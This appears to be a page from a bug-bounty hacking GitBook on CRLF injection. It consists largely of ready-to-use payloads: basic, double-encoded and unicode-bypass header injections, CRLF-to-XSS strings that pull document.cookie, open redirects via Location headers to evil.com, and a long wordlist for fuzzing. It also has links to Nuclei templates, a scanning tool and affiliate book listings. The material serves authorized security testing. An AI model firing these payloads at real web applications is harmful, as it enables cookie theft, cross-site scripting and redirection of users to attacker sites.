CRLF Injection

Carriage Return Line Feed Injection

CRLF Injection | OWASP Foundationowasp.org

Basic payload

https://example.com/?lang=en%0D%0ALocation:%20https://evil.com/

The response is

HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 09 May 2016 14:47:29 GMT
Set-Cookie: language=en
Location: https://evil.com/

Double encode

https://example.com/?lang=en%250D%250ALocation:%20https://evil.com/

Bypass unicode

https://example.com/?lang=en%E5%98%8A%E5%98%8DLocation:%20https://evil.com/

CRLF to XSS

https://subDomain.target.com/%E5%98%8D%E5%98%8ASet-Cookie:whoami=injected%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE

$6000 with Microsoft Hall of Fame | Microsoft Firewall Bypass | CRLF to XSS | Microsoft Bug BountyMedium

%0d%0aX-XSS-Protection:0%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--

Payloads

Auto_Wordlists/wordlists/crlf.txt at main · carlospolop/Auto_WordlistsGitHub

/%%0a0aSet-Cookie:crlf=injection
/%0aSet-Cookie:coffin=hi;
/%0aSet-Cookie:crlf=injection
/%0d%0a%0d%0a<script>alert('XSS')</script>;
/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e
/%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E
%0d%0aHost:%20{{Hostname}}%0d%0aCookie:%20coffin=hi%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aSet-Cookie:%20coffin=hi%0d%0a%0d%0a
/%0d%0ahost:%http://20www.google.com
/%0d%0ahost:%http://20www.google.com%0d%0a
/%0d%0aLocation:%20http://evil.com
/%0d%0aLocation:http://google.com%0d%0a
/%0d%0aSet-Cookie:coffin=hi;
/%0d%0aSet-Cookie:crlf=injection
/%0dSet-Cookie:coffin=hi;
/%0dSet-Cookie:crlf=injection
“%23%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a<svg/onload%3dalert%28document.domain%29>”
/%23%0aSet-Cookie:crlf=injection
/%23%0D%0ALocation:http://google.com;
/%23%0d%0aSet-Cookie:crlf=injection
/%23%0dSet-Cookie:crlf=injection
/%250aSet-Cookie:crlf=injection
/%25250aSet-Cookie:crlf=injection
/%25%30%61Set-Cookie:crlf=injection
/%25%30aSet-Cookie:crlf=injection
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
/%2F..%0d%0aSet-Cookie:crlf=injection
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
/%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr
/%3f%0d%0aLocation:%0d%0acoffin-x:coffin-x%0d%aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
/%3f%0d%0aSet-Cookie:crlf=injection
/%3f%0dSet-Cookie:crlf=injection
/%5Cr%20Set-Cookie:coffin=hi;
/%5Cr%5Cn%20Set-Cookie:coffin=hi;
/%5Cr%5Cn%5CtSet-Cookie:coffin%5Cr%5CtSet-Cookie:coffin=hi;
/%5Cr%5Cn%5CtSet-Cookie:coffin=hi;
/%5Cr%5Cnhost:%http://20www.google.com%5Cr%5Cn
/%5cr%5cnLocation:http://google.com
/%5Cr%5CnSet-Cookie:coffin=hi;
/%5Cr%5CtSet-Cookie:coffin=hi;
/%5CrSet-Cookie:coffin=hi;
/%E5%98%8A%E5%98%8D%0D%0ASet-Cookie:coffin=hi;
/%E5%98%8A%E5%98%8Dheader:header
/%E5%98%8A%E5%98%8DLocation:http://google.com
/%E5%98%8A%E5%98%8DSet-Cookie:coffin=hi
/%E5%98%8D%E5%98%8ALocation:http://google.com
/%E5%98%8D%E5%98%8ASet-Cookie:coffin=hi
/%E5%98%8D%E5%98%8ASet-Cookie:crlf=injection
/%E5%98%8D%E5%98%8ASet-Cookie:crlf=injection;
/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=coffinxp
/\r%20Set-Cookie:coffin=hi;
/\r\n%20Set-Cookie:coffin=hi;
/\r\nhost:%http://20www.google.com\r\n
\r\nHost: {{Hostname}}\r\nCookie: coffin=hi\r\n\r\nHTTP/1.1 200 OK\r\nSet-Cookie: coffin=hi\r\n\r\n
/\r\nLocation:http://google.com
/\r\nSet-Cookie:coffin=hi;
/\r\n\tSet-Cookie:coffin=hi;
/\rSet-Cookie:coffin=hi;
/\r\tSet-Cookie:coffin=hi;
/%u000ASet-Cookie:coffin=hi;
/%u000aSet-Cookie:crlf=injection
/www.google.com/%2E%2E%2F%0D%0Acoffin-x:coffin-x
/www.google.com/%2F..%0D%0Acoffin-x:coffin-x
//www.google.com/%2F%2E%2E%0D%0Acoffin-x:coffin-x

Nuclei Template

https://github.com/coffinxp/priv8-Nuclei/blob/main/cRlf.yamlgithub.com

nuclei-templates/cRlf.yaml at main · coffinxp/nuclei-templatesGitHub

Tool

GitHub - dwisiswant0/crlfuzz: A fast tool to scan CRLF vulnerability written in GoGitHub

CRLFuzz - Hacker Tools: Injecting CRLF for bounties 👩‍💻Intigriti

Resources

Master CRLF Injection: The Underrated Bug with Dangerous PotentialMedium

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousRelative Path Overwrite, RPO NextJSON Attack

Last updated 6 months ago